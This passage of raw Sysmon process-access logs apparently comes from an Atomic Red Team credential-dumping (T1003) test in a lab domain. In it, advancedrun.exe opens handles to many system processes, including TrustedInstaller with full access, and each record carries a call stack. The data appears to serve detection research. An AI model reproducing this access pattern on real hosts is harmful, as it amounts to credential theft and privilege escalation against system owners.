61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003944022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedR